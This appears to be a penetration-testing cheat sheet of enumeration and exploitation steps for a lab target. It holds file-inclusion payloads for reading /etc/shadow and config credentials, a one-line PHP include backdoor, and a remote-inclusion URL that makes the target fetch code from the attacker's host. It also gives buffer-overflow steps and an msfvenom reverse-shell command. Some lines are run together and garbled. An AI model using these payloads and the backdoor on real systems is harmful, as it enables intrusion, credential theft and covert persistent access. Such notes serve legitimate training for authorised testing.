Unicornscans in cli, nmap in msfconsole to help store loot in database.
unicornscan -i tap0 -I -mT $IP:a
db_nmap -e tap0 -n -v -Pn -sV -sC --version-light -A -p
unicornscan -i tap0 -I -mU $IP:a
db_nmap -e tap0 -n -v -Pn -sV -sC --version-light -A -sU -p
This is the essential part of penetration. Find out what is available and how you could punch through it with minimum ease.
DO NOT SKIP STEPS.
DO NOT PASS GO.
SEARCH ALL THE VERSIONS WITH searchsploit
(or google -> site:exploit-db.com APP VERSION
)
curl -i ${IP}/robots.txt
Note down Server and other module versions.
searchsploit them ALL.
Visit all URLs from robots.txt.
nikto -host $IP
gobuster -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/Top1000-RobotsDisallowed.txt
gobuster -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/common.txt
if nothing, find more web word lists.
Browse the site but keep an eye on the burp window / source code / cookies etc.
Things to be on look for:
/etc/passwd
| /etc/shadow
insta-win/var/www/html/config.php
or similar paths to get SQL etc creds?page=php://filter/convert.base64-encode/resource=../config.php
../../../../../boot.ini
to find out windows version<?php include $_GET['inc']; ?>
simplest backdoor to keep it dynamic without anything messing your outputhttp://$IP/inc.php?inc=http://$YOURIP/bg.php
and have full control with minimal footprint on target machinephpinfo()
Heartbleed / CRIME / Other similar attacks
Read the actual SSL CERT to:
msfpescan
/ BOF targetsenum4linux -a $IP
Read through the report and search for versions of things => searchsploit
smbclient -L $IP
Mount shares
mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//10.10.10.10/My Share" /mnt/cifs
Can you access shares?
Quick test of communities:
onesixtyone
Full discovery of everything you can:
snmp-check
Unless you get a MOTD or a broken sshd version, you are SOOL and this is likely just a secondary access point once you break something else.
SMTP, POP3(s) and IMAP(s) are good for enumerating users.
Also: CHECK VERSIONS and searchsploit
pattern_create.rb
& pattern_offset.rb
JMP ESP
sub ESP, 200
and then JMP ESP
call [ESP-200]
msfvenom -a x86 --platform windows/linux -p something/shell/reverse_tcp lhost=x.x.x.x lport=53 -f exe/elf/python/perl/php -o filename
cewl
for crawling a site for bruteforcing user/passwordnmap
scripts!
--script smtp-commands
or --script auth-owners